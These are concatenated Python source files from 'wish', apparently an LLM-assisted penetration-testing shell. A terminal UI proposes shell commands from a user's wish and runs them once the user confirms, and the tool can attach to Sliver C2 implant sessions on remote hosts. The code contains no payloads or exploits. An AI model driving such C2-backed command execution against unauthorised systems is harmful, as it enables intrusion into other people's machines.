"""UI updater for command execution screen."""

from typing import Protocol

from wish_models import Wish


class WidgetQuerier(Protocol):
    """Protocol for querying widgets."""

    def query_one(self, selector: str) -> 'Widget':
        """Query a widget by selector."""
        ...


class Widget(Protocol):
    """Protocol for widgets."""

    def update(self, content: str) -> None:
        """Update the widget content."""
        ...


class UIUpdater:
    """Updates the UI for command execution."""

    def __init__(self, screen: WidgetQuerier):
        """Initialize the UI updater.

        Args:
            screen: The screen to update.
        """
        self.screen = screen

    def update_command_status(self, wish: Wish) -> None:
        """Update the UI with current command statuses.

        Args:
            wish: The wish to update the UI for.
        """
        for result in wish.command_results:
            if result:
                # Format the status text
                status = f"Status: {result.state.value}"
                if result.exit_code is not None:
                    status += f" (exit code: {result.exit_code})"

                # Add execution time if command is finished
                if result.finished_at and result.created_at:
                    execution_time = result.finished_at - result.created_at
                    status += f"\nExecution time: {execution_time}"

                if result.log_summary:
                    status += f"\nSummary: {result.log_summary}"

                # Add stdout and stderr content (max 5 lines each)
                if result.finished_at and result.log_files:
                    # Read stdout (max 5 lines)
                    try:
                        with open(result.log_files.stdout, 'r') as f:
                            stdout_lines = f.readlines()
                            if stdout_lines:
                                # Get last 5 lines or all if less than 5
                                stdout_content = stdout_lines[-5:] if len(stdout_lines) > 5 else stdout_lines
                                status += "\n\nstdout:\n" + "".join(stdout_content)
                    except Exception:
                        pass

                    # Read stderr (max 5 lines)
                    try:
                        with open(result.log_files.stderr, 'r') as f:
                            stderr_lines = f.readlines()
                            if stderr_lines:
                                # Get last 5 lines or all if less than 5
                                stderr_content = stderr_lines[-5:] if len(stderr_lines) > 5 else stderr_lines
                                status += "\n\nstderr:\n" + "".join(stderr_content)
                    except Exception:
                        pass

                # Update the status widget
                status_widget = self.screen.query_one(f"#command-status-{result.num}")
                status_widget.update(status)

    def show_completion_message(self, message: str) -> None:
        """Show a completion message.

        Args:
            message: The message to show.
        """
        execution_text = self.screen.query_one("#execution-text")
        execution_text.update(message)



from enum import Enum, auto
from typing import Callable, Dict, List, Optional

from wish_models import Wish


class ShellState(Enum):
    """Enumeration of states in the Shell Turns state machine"""

    INPUT_WISH = auto()
    ASK_WISH_DETAIL = auto()
    SUGGEST_COMMANDS = auto()
    CONFIRM_COMMANDS = auto()
    ADJUST_COMMANDS = auto()
    SHOW_WISHLIST = auto()
    SELECT_WISH = auto()
    SHOW_COMMANDS = auto()
    SELECT_COMMAND = auto()
    SELECT_COMMANDS = auto()
    SHOW_LOG_SUMMARY = auto()
    CANCEL_COMMANDS = auto()
    START_COMMANDS = auto()


class ShellEvent(Enum):
    """Enumeration of events in the Shell Turns state machine"""

    SUFFICIENT_WISH = auto()
    INSUFFICIENT_WISH = auto()
    OK = auto()
    NO = auto()
    CTRL_R = auto()  # wishlist
    CTRL_C = auto()  # cancel
    WISH_NUMBER = auto()
    SHOW_MORE = auto()
    MULTIPLE_COMMANDS = auto()
    SINGLE_COMMAND = auto()
    BACK_TO_INPUT = auto()


class ShellTurns:
    """Implementation of the Shell Turns state machine"""

    def __init__(self):
        self.current_state = ShellState.INPUT_WISH
        self.current_wish: Optional[Wish] = None
        self.current_commands: List[str] = []
        self.selected_commands: List[str] = []
        self.wishes: List[Wish] = []
        self.selected_wish_index: Optional[int] = None

        # Initialize the state transition table
        self.transitions: Dict[ShellState, Dict[ShellEvent, ShellState]] = {
            ShellState.INPUT_WISH: {
                ShellEvent.SUFFICIENT_WISH: ShellState.SUGGEST_COMMANDS,
                ShellEvent.INSUFFICIENT_WISH: ShellState.ASK_WISH_DETAIL,
                ShellEvent.CTRL_R: ShellState.SHOW_WISHLIST,
                ShellEvent.CTRL_C: ShellState.CANCEL_COMMANDS,
            },
            ShellState.ASK_WISH_DETAIL: {
                ShellEvent.OK: ShellState.SUGGEST_COMMANDS,
                ShellEvent.NO: ShellState.INPUT_WISH,
            },
            ShellState.SUGGEST_COMMANDS: {
                ShellEvent.OK: ShellState.CONFIRM_COMMANDS,
                ShellEvent.NO: ShellState.ADJUST_COMMANDS,
            },
            ShellState.CONFIRM_COMMANDS: {
                ShellEvent.OK: ShellState.START_COMMANDS,
                ShellEvent.NO: ShellState.INPUT_WISH,
            },
            ShellState.ADJUST_COMMANDS: {
                ShellEvent.OK: ShellState.SUGGEST_COMMANDS,
            },
            ShellState.SHOW_WISHLIST: {
                ShellEvent.WISH_NUMBER: ShellState.SELECT_WISH,
                ShellEvent.SHOW_MORE: ShellState.SHOW_WISHLIST,
                ShellEvent.BACK_TO_INPUT: ShellState.INPUT_WISH,
            },
            ShellState.SELECT_WISH: {
                ShellEvent.OK: ShellState.SHOW_COMMANDS,
            },
            ShellState.SHOW_COMMANDS: {
                ShellEvent.MULTIPLE_COMMANDS: ShellState.SELECT_COMMAND,
                ShellEvent.SINGLE_COMMAND: ShellState.SHOW_LOG_SUMMARY,
            },
            ShellState.SELECT_COMMAND: {
                ShellEvent.OK: ShellState.SHOW_LOG_SUMMARY,
            },
            ShellState.SELECT_COMMANDS: {
                ShellEvent.OK: ShellState.CANCEL_COMMANDS,
            },
            ShellState.SHOW_LOG_SUMMARY: {
                ShellEvent.BACK_TO_INPUT: ShellState.INPUT_WISH,
            },
            ShellState.CANCEL_COMMANDS: {
                ShellEvent.BACK_TO_INPUT: ShellState.INPUT_WISH,
            },
            ShellState.START_COMMANDS: {
                ShellEvent.BACK_TO_INPUT: ShellState.INPUT_WISH,
            },
        }

        # Handler functions for each state
        self.state_handlers: Dict[ShellState, Callable] = {}

    def register_handler(self, state: ShellState, handler: Callable):
        """Register a handler function for a state"""
        self.state_handlers[state] = handler

    def transition(self, event: ShellEvent) -> bool:
        """Transition to a new state based on the event

        Returns:
            bool: Whether the transition was successful
        """
        if event in self.transitions.get(self.current_state, {}):
            self.current_state = self.transitions[self.current_state][event]
            return True
        return False

    def handle_current_state(self) -> Optional[ShellEvent]:
        """Execute the handler function for the current state

        Returns:
            Optional[ShellEvent]: The event returned by the handler (if any)
        """
        if self.current_state in self.state_handlers:
            return self.state_handlers[self.current_state]()
        return None

    def run(self):
        """Run the state machine"""
        while True:
            event = self.handle_current_state()
            if event:
                self.transition(event)

    def set_current_wish(self, wish: Wish):
        """Set the current wish"""
        self.current_wish = wish

    def set_current_commands(self, commands: List[str]):
        """Set the current command list"""
        self.current_commands = commands

    def set_selected_commands(self, commands: List[str]):
        """Set the selected command list"""
        self.selected_commands = commands

    def set_wishes(self, wishes: List[Wish]):
        """Set the wish list"""
        self.wishes = wishes

    def set_selected_wish_index(self, index: int):
        """Set the index of the selected wish"""
        self.selected_wish_index = index

    def get_current_wish(self) -> Optional[Wish]:
        """Get the current wish"""
        return self.current_wish

    def get_current_commands(self) -> List[str]:
        """Get the current command list"""
        return self.current_commands

    def get_selected_commands(self) -> List[str]:
        """Get the selected command list"""
        return self.selected_commands

    def get_wishes(self) -> List[Wish]:
        """Get the wish list"""
        return self.wishes

    def get_selected_wish(self) -> Optional[Wish]:
        """Get the selected wish"""
        if self.selected_wish_index is not None and 0 <= self.selected_wish_index < len(self.wishes):
            return self.wishes[self.selected_wish_index]
        return None



import asyncio
from typing import Optional

from textual import on
from textual.app import App, ComposeResult
from textual.containers import Container, Vertical
from textual.screen import ModalScreen, Screen
from textual.widgets import Button, Footer, Header, Input, Label, Static
from wish_models import Settings, Wish, WishState
from wish_models.command_result.command_state import CommandState
from wish_models.system_info import SystemInfo

from wish_sh.system_info_display import display_system_info
from wish_sh.tui.widgets import UIUpdater
from wish_sh.wish_manager import WishManager


class SystemInfoModal(ModalScreen):
    """Modal screen for displaying basic system information."""

    def __init__(self, system_info):
        """Initialize the system info modal.

        Args:
            system_info: The system information to display
        """
        super().__init__()
        self.system_info = system_info

    def compose(self) -> ComposeResult:
        """Compose the modal screen."""
        # Create a container for the modal content
        yield Container(
            Label("System Information", id="modal-title"),
            Static(self._format_basic_info(), id="basic-info", markup=False),
            Button("Close", id="close-button", variant="primary"),
            id="modal-container",
        )

    def _format_basic_info(self) -> str:
        """Format basic system information for display."""
        # Format basic information without markup
        info = self.system_info
        lines = [
            f"OS: {info.os}",
            f"Architecture: {info.arch}",
        ]
        if info.version:
            lines.append(f"Version: {info.version}")
        lines.extend([
            f"Hostname: {info.hostname}",
            f"Username: {info.username}",
        ])
        if info.uid:
            lines.append(f"UID: {info.uid}")
        if info.gid:
            lines.append(f"GID: {info.gid}")
        if info.pid:
            lines.append(f"PID: {info.pid}")

        return "\n".join(lines)

    @on(Button.Pressed, "#close-button")
    def on_close_button_pressed(self) -> None:
        """Handle close button press."""
        self.app.pop_screen()


class ExecutablesModal(ModalScreen):
    """Modal screen for displaying executables information."""

    def __init__(self, executables):
        """Initialize the executables modal.

        Args:
            executables: The executables collection to display
        """
        super().__init__()
        self.executables = executables

    def compose(self) -> ComposeResult:
        """Compose the modal screen."""
        # Create a container for the modal content
        yield Container(
            Label("Executables", id="modal-title"),
            Static(self._format_executables(), id="executables-info", markup=False),
            Button("Close", id="close-button", variant="primary"),
            id="modal-container",
        )

    def _format_executables(self) -> str:
        """Format executable information for display."""
        # Format executable information without markup
        lines = [
            f"Executables ({len(self.executables.executables)} files)"
        ]

        # Group executables by directory
        grouped = self.executables.group_by_directory()

        # Add directories and files
        for directory in sorted(grouped.keys()):
            lines.append(f"\n{directory} ({len(grouped[directory])} files)")

            # Add files in this directory
            for exe in sorted(grouped[directory], key=lambda x: x.filename)[:10]:  # Limit to 10 files per directory
                if exe.permissions:
                    lines.append(f"  {exe.filename} ({exe.permissions}, {exe.size} bytes)")
                else:
                    lines.append(f"  {exe.filename} ({exe.size} bytes)")

            # If there are more files, show a message
            if len(grouped[directory]) > 10:
                lines.append(f"  ... and {len(grouped[directory]) - 10} more files")

        return "\n".join(lines)

    @on(Button.Pressed, "#close-button")
    def on_close_button_pressed(self) -> None:
        """Handle close button press."""
        self.app.pop_screen()


class WishInput(Screen):
    """Screen for inputting a wish."""

    def compose(self) -> ComposeResult:
        """Compose the wish input screen."""
        yield Header(show_clock=True)
        yield Container(
            Label("wish✨️", id="wish-prompt", markup=False),
            Input(placeholder="Enter your wish here...", id="wish-input"),
            Container(
                Button("System Info", id="system-info-button", variant="default"),
                Button("Executables", id="executables-button", variant="default"),
                id="info-buttons-container",
            ),
            id="wish-container",
        )
        yield Footer()

    @on(Button.Pressed, "#system-info-button")
    def on_system_info_button_pressed(self) -> None:
        """Handle system info button press."""
        self.app.action_show_system_info()

    @on(Button.Pressed, "#executables-button")
    def on_executables_button_pressed(self) -> None:
        """Handle executables button press."""
        self.app.action_show_executables()

    @on(Input.Submitted)
    async def on_input_submitted(self, event: Input.Submitted) -> None:
        """Handle input submission."""
        wish_text = event.value.strip()
        if wish_text:
            # Create a new wish
            wish = Wish.create(wish_text)
            wish.state = WishState.DOING

            # Generate commands using WishManager (now async)
            commands, error = await self.app.wish_manager.generate_commands(wish_text)

            # Switch to command suggestion screen
            self.app.push_screen(CommandSuggestion(wish, commands, error))


class CommandSuggestion(Screen):
    """Screen for suggesting commands."""

    def __init__(self, wish: Wish, commands: list[str], error: Optional[str] = None) -> None:
        """Initialize the command suggestion screen."""
        super().__init__()
        self.wish = wish
        self.commands = commands
        self.error = error

    def compose(self) -> ComposeResult:
        """Compose the command suggestion screen."""
        yield Header(show_clock=True)

        if self.error:
            # Display error message
            yield Vertical(
                Label(f"Wish: {self.wish.wish}", id="wish-text", markup=False),
                Static(f"Error: {self.error}", id="error-text", markup=False),
                Container(
                    Button("Back to Wish Input", id="back-button"),
                    id="button-container",
                ),
                id="error-container",
            )
        else:
            # Display command suggestions
            yield Vertical(
                Label(f"Wish: {self.wish.wish}", id="wish-text", markup=False),
                Static("Do you want to execute these commands?", id="confirmation-text", markup=False),
                *(
                    Label(f"[{i + 1}] {cmd}", id=f"command-{i + 1}", markup=False)
                    for i, cmd in enumerate(self.commands)
                ),
                Container(
                    Button("Yes", id="yes-button", variant="success"),
                    Button("No", id="no-button", variant="error"),
                    id="button-container",
                ),
                id="command-container",
            )
        yield Footer()

    @on(Button.Pressed, "#yes-button")
    def on_yes_button_pressed(self) -> None:
        """Handle yes button press."""
        # Execute the commands using WishManager
        self.app.push_screen(CommandExecutionScreen(self.wish, self.commands, self.app.wish_manager))

    @on(Button.Pressed, "#no-button")
    def on_no_button_pressed(self) -> None:
        """Handle no button press."""
        # Go back to wish input screen
        self.app.pop_screen()

    @on(Button.Pressed, "#back-button")
    def on_back_button_pressed(self) -> None:
        """Handle back button press."""
        # Go back to wish input screen
        self.app.pop_screen()


class CommandExecutionScreen(Screen):
    """Screen for showing command execution."""

    def __init__(self, wish: Wish, commands: list[str], wish_manager: WishManager) -> None:
        """Initialize the command execution screen."""
        super().__init__()
        self.wish = wish
        self.commands = commands
        self.wish_manager = wish_manager
        self.command_statuses: dict[int, str] = {}  # Mapping of command numbers to statuses
        self.all_completed = False
        self.api_error_detected = False  # Flag to track API errors

        # Initialize command execution components
        self.executor = wish_manager.executor
        self.tracker = wish_manager.tracker
        self.ui_updater = UIUpdater(self)

    def compose(self) -> ComposeResult:
        """Compose the command execution screen."""
        yield Header(show_clock=True)
        yield Vertical(
            Label(f"Wish: {self.wish.wish}", id="wish-text", markup=False),
            Static("Executing commands...", id="execution-text", markup=False),
            *(
                Vertical(
                    Label(f"[{i + 1}] {cmd}", id=f"command-{i + 1}", markup=False),
                    Static("Waiting...", id=f"command-status-{i + 1}", classes="command-status"),
                    classes="command-container",
                )
                for i, cmd in enumerate(self.commands)
            ),
            Container(
                Button("Back to Wish Input", id="back-button"),
                Button("Retry Analysis", id="retry-button", variant="primary", disabled=True),
                id="button-container",
            ),
            id="execution-container",
        )
        yield Footer()

    def on_mount(self) -> None:
        """Handle screen mount event."""
        # Start command execution
        self.executor.execute_commands(self.wish, self.commands)

        # Asynchronously monitor command status
        asyncio.create_task(self.monitor_commands())

    async def monitor_commands(self) -> None:
        """Asynchronously monitor command execution status."""
        while not self.all_completed:
            # Check status of running commands
            self.tracker.check_status(self.wish)

            # Analyze logs for completed commands that don't have log_summary yet
            for cmd_result in self.wish.command_results:
                if cmd_result.finished_at and not cmd_result.log_summary:
                    # Analyze the command result
                    analyzed_result = self.wish_manager.analyze_log(cmd_result)

                    # Check if API error occurred
                    if analyzed_result.state and analyzed_result.state == CommandState.API_ERROR:
                        self.api_error_detected = True
                        # Enable retry button
                        retry_button = self.query_one("#retry-button")
                        retry_button.disabled = False

                    # Update the command result in the wish object
                    for i, result in enumerate(self.wish.command_results):
                        if result.num == cmd_result.num:
                            self.wish.command_results[i] = analyzed_result
                            break

            # Update UI
            self.ui_updater.update_command_status(self.wish)

            # Check if all commands have completed
            if not self.all_completed:
                self.check_all_commands_completed()

            await asyncio.sleep(0.5)

    def check_all_commands_completed(self) -> None:
        """Check if all commands have completed and update wish state."""
        # Check if all commands have completed
        all_completed, any_failed = self.tracker.is_all_completed(self.wish)

        if all_completed:
            # Update wish state
            self.tracker.update_wish_state(self.wish)
            self.all_completed = True

            # Display completion message
            completion_message = self.tracker.get_completion_message(self.wish)

            # Add API error message if needed
            if self.api_error_detected:
                completion_message += "\nAPI error detected. Please check your internet connection and API key."

            self.ui_updater.show_completion_message(completion_message)

    @on(Button.Pressed, "#back-button")
    def on_back_button_pressed(self) -> None:
        """Handle back button press."""
        # Go back to wish input screen (pop twice to skip command suggestion)
        self.app.pop_screen()
        self.app.pop_screen()

    @on(Button.Pressed, "#retry-button")
    def on_retry_button_pressed(self) -> None:
        """Handle retry button press."""
        # Reset API error flag
        self.api_error_detected = False

        # Disable retry button
        retry_button = self.query_one("#retry-button")
        retry_button.disabled = True

        # Retry analysis for commands with API errors
        for cmd_result in self.wish.command_results:
            if cmd_result.state == CommandState.API_ERROR:
                # Reset the state to allow re-analysis
                cmd_result.state = CommandState.DOING
                cmd_result.log_summary = None

        # Update UI to show "Retrying..." status
        for _i, cmd_result in enumerate(self.wish.command_results):
            if cmd_result.state == CommandState.DOING:
                status_widget = self.query_one(f"#command-status-{cmd_result.num}")
                status_widget.update("Retrying analysis...")

        # Update execution text
        execution_text = self.query_one("#execution-text")
        execution_text.update("Retrying analysis...")


class WishApp(App):
    """The main Wish TUI application."""

    CSS_PATH = "tui/styles/app.css"

    TITLE = "Wish Shell"
    SCREENS = {"wish_input": WishInput}
    BINDINGS = [
        ("escape", "quit", "Quit")
    ]

    def __init__(self, backend_config=None, settings=None):
        """Initialize the Wish TUI application.

        Args:
            backend_config: Backend configuration (optional).
            settings: Application settings (optional).
        """
        super().__init__()
        self.settings = settings or Settings()
        self.wish_manager = WishManager(self.settings, backend_config)

        # Basic system information
        self.system_info = None
        self.system_info_state = "not_started"  # System information collection state

        # Executable files information
        self.executables = None
        self.executables_state = "not_started"  # Executable files collection state

    def update_info_buttons(self):
        """Update both info buttons based on collection state."""
        try:
            wish_input = self.query_one(WishInput)

            # Update System Info button
            system_info_button = wish_input.query_one("#system-info-button")
            if self.system_info_state == "collecting":
                system_info_button.label = "Collecting..."
                system_info_button.disabled = True
                system_info_button.variant = "warning"
            elif self.system_info_state == "ready":
                system_info_button.label = "System Info"
                system_info_button.disabled = False
                system_info_button.variant = "success"
            elif self.system_info_state == "error":
                system_info_button.label = "System Info (Error)"
                system_info_button.disabled = False
                system_info_button.variant = "error"
            else:  # not_started
                system_info_button.label = "System Info"
                system_info_button.disabled = False
                system_info_button.variant = "default"

            # Update Executables button
            executables_button = wish_input.query_one("#executables-button")
            if self.executables_state == "collecting":
                executables_button.label = "Collecting..."
                executables_button.disabled = True
                executables_button.variant = "warning"
            elif self.executables_state == "ready":
                executables_button.label = "Executables"
                executables_button.disabled = False
                executables_button.variant = "success"
            elif self.executables_state == "error":
                executables_button.label = "Executables (Error)"
                executables_button.disabled = False
                executables_button.variant = "error"
            else:  # not_started
                executables_button.label = "Executables"
                executables_button.disabled = False
                executables_button.variant = "default"
        except Exception:
            # Screen may not be displayed yet
            pass

    def update_system_info_button(self):
        """Update the System Info button based on collection state (legacy method)."""
        self.update_info_buttons()

    async def collect_system_info(self):
        """Collect system information."""
        # Set collection state to collecting
        self.system_info_state = "collecting"
        self.update_info_buttons()

        self.console.print("[bold green]Collecting system information...[/bold green]")

        try:
            # Get basic system information from backend
            self.system_info = await self.wish_manager.executor.backend.get_system_info()

            # Set collection state to ready
            self.system_info_state = "ready"
            self.update_info_buttons()

            # Display basic system information
            display_system_info(self.system_info, self.console)

        except Exception as e:
            # Set collection state to error
            self.system_info_state = "error"
            self.update_info_buttons()

            self.console.print(f"[bold red]Error collecting system information: {str(e)}[/bold red]")

            # Set minimal information even in case of error
            self.system_info = SystemInfo(
                os="Unknown (Error)",
                arch="Unknown",
                hostname="Unknown",
                username="Unknown",
                version=f"Error: {str(e)}"
            )

    def action_show_system_info(self) -> None:
        """Show system information in a modal window."""
        if self.system_info_state == "collecting":
            self.console.print("[yellow]System information is being collected. Please wait...[/yellow]")
            return

        if not self.system_info:
            self.console.print("[yellow]System information not available yet. Please wait...[/yellow]")
            return

        # Show system information in a modal window
        self.push_screen(SystemInfoModal(self.system_info))

    async def collect_executables(self):
        """Collect executable files information."""
        # Set collection state to collecting
        self.executables_state = "collecting"
        self.update_info_buttons()

        self.console.print("[bold green]Collecting executables information...[/bold green]")

        try:
            # Get executables from backend
            self.executables = await self.wish_manager.executor.backend.get_executables(
                collect_system_executables=False  # Only collect PATH executables by default
            )

            # Set collection state to ready
            self.executables_state = "ready"
            self.update_info_buttons()

            # Display executables information
            count = len(self.executables.executables)
            self.console.print(f"[green]✓ Collected {count} executables[/green]")

            # Show summary of executables by directory
            grouped = self.executables.group_by_directory()
            for directory, exes in sorted(grouped.items())[:5]:  # Show top 5 directories
                self.console.print(f"[green]{directory}: {len(exes)} files[/green]")

            if len(grouped) > 5:
                self.console.print(f"[green]... and {len(grouped) - 5} more directories[/green]")

        except Exception as e:
            # Set collection state to error
            self.executables_state = "error"
            self.update_info_buttons()

            self.console.print(f"[bold red]Error collecting executables: {str(e)}[/bold red]")

            # Set empty collection even in case of error
            from wish_models.system_info import ExecutableCollection
            self.executables = ExecutableCollection()

    def action_show_executables(self) -> None:
        """Show executables information in a modal window."""
        if self.executables_state == "not_started":
            # Start collection on first execution
            self.console.print("[yellow]Starting executables collection...[/yellow]")
            asyncio.create_task(self.collect_executables())
            return

        if self.executables_state == "collecting":
            self.console.print("[yellow]Executables information is being collected. Please wait...[/yellow]")
            return

        if not self.executables or not self.executables.executables:
            self.console.print("[yellow]No executables available.[/yellow]")
            return

        # Show executables information in a modal window
        self.push_screen(ExecutablesModal(self.executables))

    def on_mount(self) -> None:
        """Handle app mount event."""
        # Show the wish input screen first
        self.push_screen("wish_input")

        # Update button states
        self.update_info_buttons()

        # Then start collecting system information
        asyncio.create_task(self.collect_system_info())

        # Don't automatically start collecting executables
        # Let the user click the button to start collection


def main(backend_config=None, settings=None) -> None:
    """Run the Wish TUI application.

    Args:
        backend_config: Backend configuration (optional).
        settings: Application settings (optional).
    """
    app = WishApp(backend_config, settings)
    app.run()


if __name__ == "__main__":
    main()



import os
from unittest.mock import patch

from wish_sh.settings import Settings


class TestSettings:
    def test_initialization_with_default(self):
        """Test that Settings initializes with the default WISH_HOME when environment variable is not set."""
        with patch.dict(
            os.environ,
            {
                "OPENAI_API_KEY": "test-api-key",  # Required field
                "OPENAI_MODEL": "test-model",  # Optional but providing for completeness
            },
            clear=True,
        ):
            settings = Settings()
            expected_default = os.path.join(os.path.expanduser("~"), ".wish")
            assert settings.WISH_HOME == expected_default
            assert settings.WISH_HOME == expected_default  # Test property
            assert settings.OPENAI_API_KEY == "test-api-key"
            assert settings.OPENAI_MODEL == "test-model"

    def test_initialization_with_env_var(self):
        """Test that Settings initializes with the WISH_HOME from environment variable when it is set."""
        custom_wish_home = "/custom/wish/home"
        with patch.dict(
            os.environ,
            {
                "WISH_HOME": custom_wish_home,
                "OPENAI_API_KEY": "test-api-key",  # Required field
                "OPENAI_MODEL": "test-model",  # Optional but providing for completeness
            },
            clear=True,
        ):
            settings = Settings()
            assert settings.WISH_HOME == custom_wish_home
            assert settings.WISH_HOME == custom_wish_home  # Test property
            assert settings.OPENAI_API_KEY == "test-api-key"
            assert settings.OPENAI_MODEL == "test-model"

    def test_initialization_from_env_file(self, tmp_path):
        """Test that Settings initializes with values from .env file."""
        # 一時的な .env ファイルを作成
        env_file = tmp_path / ".env"
        env_file.write_text(
            "OPENAI_API_KEY=sk-test-env-file-key\nOPENAI_MODEL=gpt-4-turbo\nWISH_HOME=/custom/env/file/path\n"
        )

        # 環境変数をクリア
        with patch.dict(os.environ, {}, clear=True):
            # .env ファイルのパスを指定して Settings をインスタンス化
            settings = Settings(_env_file=str(env_file))

            # .env ファイルから読み込まれた値を検証
            assert settings.OPENAI_API_KEY == "sk-test-env-file-key"
            assert settings.OPENAI_MODEL == "gpt-4-turbo"
            assert settings.WISH_HOME == "/custom/env/file/path"



"""System information display utilities."""

from rich.console import Console
from rich.table import Table
from rich.tree import Tree
from wish_models.system_info import SystemInfo


def display_system_info(info: SystemInfo, console: Console) -> None:
    """
    Display system information in a formatted way.

    Args:
        info: The system information to display
        console: The console to display on
    """
    # Basic system information table
    table = Table(title="System Information")

    table.add_column("Property", style="cyan")
    table.add_column("Value", style="green")

    table.add_row("OS", info.os)
    table.add_row("Architecture", info.arch)
    if info.version:
        table.add_row("Version", info.version)
    table.add_row("Hostname", info.hostname)
    table.add_row("Username", info.username)
    if info.uid:
        table.add_row("UID", info.uid)
    if info.gid:
        table.add_row("GID", info.gid)
    if info.pid:
        table.add_row("PID", str(info.pid))

    console.print(table)


def display_executables(collection, title: str, console: Console) -> None:
    """
    Display executables grouped by directory.

    Args:
        collection: The executable collection to display
        title: The title for the display
        console: The console to display on
    """
    if not collection or not collection.executables:
        console.print(f"[yellow]No {title.lower()} found.[/yellow]")
        return

    # Group executables by directory
    grouped = collection.group_by_directory()

    # Create a tree view
    tree = Tree(f"[bold]{title}[/bold] ({len(collection.executables)} files)")

    # Sort directories for consistent display
    for directory in sorted(grouped.keys()):
        dir_tree = tree.add(f"[blue]{directory}[/blue] ({len(grouped[directory])} files)")

        # Sort files within each directory
        for exe in sorted(grouped[directory], key=lambda x: x.filename):
            if exe.permissions:
                dir_tree.add(f"[green]{exe.filename}[/green] ({exe.permissions}, {exe.size} bytes)")
            else:
                dir_tree.add(f"[green]{exe.filename}[/green] ({exe.size} bytes)")

    console.print(tree)



"""Entry point for the wish shell."""

import argparse
import asyncio

from sliver import SliverClient, SliverClientConfig
from wish_command_execution.backend import BashConfig, SliverConfig
from wish_models import Settings

from wish_sh.wish_tui import main as tui_main


async def check_sliver_sessions(config_path):
    """Check Sliver sessions and return appropriate session ID.

    Returns the session ID if only one session exists.
    Displays a list of sessions and returns None if multiple sessions exist.
    Displays an error message and returns None if no sessions exist.

    Args:
        config_path: Path to the Sliver client configuration file.

    Returns:
        The session ID if only one session exists, None otherwise.
    """
    try:
        # Load client configuration from file
        config = SliverClientConfig.parse_config_file(config_path)
        client = SliverClient(config)

        # Connect to server
        await client.connect()

        # Get session list
        sessions = await client.sessions()

        if not sessions:
            print("Error: No active Sliver sessions available.")
            return None

        if len(sessions) == 1:
            # Automatically select if only one session exists
            return sessions[0].ID

        # Display list if multiple sessions exist
        print("Multiple Sliver sessions found. Please specify one with --sliver-session:")
        for i, session in enumerate(sessions):
            print(f"  [{i+1}] ID: {session.ID}")
            print(f"      Name: {session.Name}")
            print(f"      Hostname: {session.Hostname}")
            print(f"      Username: {session.Username}")
            print(f"      OS: {session.OS} {session.Arch}")
            print(f"      Remote Address: {session.RemoteAddress}")
            print()

        return None

    except Exception as e:
        print(f"Error connecting to Sliver server: {str(e)}")
        return None


def main():
    """Entry point for the wish shell."""
    parser = argparse.ArgumentParser(description="wish - LLM-assisted shell for penetration testing")

    # Sliver C2 related arguments
    parser.add_argument("--sliver-config", help="Path to Sliver client config file")
    parser.add_argument("--sliver-session", help="Sliver C2 session ID (optional if only one session exists)")

    # Environment configuration
    parser.add_argument("--env-file", help="Path to .env file (default: $WISH_HOME/env)")

    args = parser.parse_args()

    # Create backend configuration
    if args.sliver_config:
        # Handle Sliver session
        if not args.sliver_session:
            # If session ID is not specified, check available sessions
            try:
                # Get existing event loop or create a new one
                loop = asyncio.get_event_loop()
                session_id = loop.run_until_complete(check_sliver_sessions(args.sliver_config))
            except RuntimeError:
                # If no event loop exists, create a new one
                session_id = asyncio.run(check_sliver_sessions(args.sliver_config))

            if not session_id:
                # Exit if multiple sessions or no sessions found
                return
        else:
            session_id = args.sliver_session

        backend_config = SliverConfig(
            session_id=session_id,
            client_config_path=args.sliver_config
        )
    else:
        backend_config = BashConfig()

    # Create settings with custom env file if specified
    settings = Settings(env_file=args.env_file) if args.env_file else Settings()

    # Launch TUI with settings
    tui_main(backend_config, settings=settings)


if __name__ == "__main__":
    main()



from pathlib import Path
from unittest.mock import MagicMock, patch

import pytest
from wish_models.test_factories import WishDoingFactory

from wish_sh.test_factories import WishManagerFactory


class TestWishManagerWithSleepCommand:
    """Tests for WishManager with sleep commands."""

    @pytest.fixture
    def wish(self):
        """Create a test wish."""
        return WishDoingFactory.create()

    @pytest.mark.asyncio
    async def test_execute_sleep_command(self, wish):
        """Test that a sleep command is executed and tracked correctly.

        This test verifies:
        1. A sleep command is properly executed by WishManager
        2. The command is tracked while executing
        3. The command state is updated to SUCCESS when completed
        4. The command is removed from tracking when finished
        """
        # Create a WishManager with mocked file operations
        wish_manager = WishManagerFactory.create()

        # Mock the executor
        wish_manager.executor = MagicMock()

        # Mock the create_command_log_dirs method to avoid file system operations
        with patch.object(wish_manager.paths, "create_command_log_dirs") as mock_create_dirs:
            mock_create_dirs.return_value = Path("/path/to/log/dir")

            # Mock open to avoid file operations
            with patch("builtins.open", MagicMock()):
                # Execute a sleep command
                cmd = "sleep 1"
                wish_manager.execute_command(wish, cmd, 1)

                # Verify that the executor.execute_command was called
                wish_manager.executor.execute_command.assert_called_once_with(wish, cmd, 1)

    @pytest.mark.asyncio
    async def test_multiple_sleep_commands(self, wish):
        """Test that multiple sleep commands are executed and tracked correctly.

        This test verifies:
        1. Multiple commands with different durations are executed properly
        2. All commands are initially tracked
        3. Commands are removed from tracking as they complete
        4. Command states are updated correctly based on exit codes
        5. Command completion is tracked in the correct order
        """
        # Create a WishManager with mocked file operations
        wish_manager = WishManagerFactory.create()

        # Mock the executor
        wish_manager.executor = MagicMock()

        # Mock the create_command_log_dirs method to avoid file system operations
        with patch.object(wish_manager.paths, "create_command_log_dirs") as mock_create_dirs:
            mock_create_dirs.return_value = Path("/path/to/log/dir")

            # Mock open to avoid file operations
            with patch("builtins.open", MagicMock()):
                # Execute multiple sleep commands with different durations
                cmds = [
                    "sleep 0.5",
                    "sleep 1",
                    "sleep 1.5",
                ]

                for i, cmd in enumerate(cmds, 1):
                    wish_manager.execute_command(wish, cmd, i)

                # Verify that the executor.execute_command was called for each command
                assert wish_manager.executor.execute_command.call_count == 3
                for i, cmd in enumerate(cmds, 1):
                    wish_manager.executor.execute_command.assert_any_call(wish, cmd, i)

    @pytest.mark.asyncio
    async def test_check_running_commands(self, wish):
        """Test that check_running_commands updates the status of running commands."""
        # Create a WishManager with mocked file operations
        wish_manager = WishManagerFactory.create()

        # Mock the executor
        wish_manager.executor = MagicMock()

        # Check running commands
        wish_manager.check_running_commands()

        # Verify that executor.check_running_commands was called
        wish_manager.executor.check_running_commands.assert_called_once()



"""Settings for wish-sh package."""

import os

from pydantic import ConfigDict, Field
from pydantic_settings import BaseSettings

# Constants
DEFAULT_WISH_HOME = os.path.join(os.path.expanduser("~"), ".wish")

class Settings(BaseSettings):
    """Application settings."""

    # Wish home directory
    WISH_HOME: str = Field(DEFAULT_WISH_HOME)

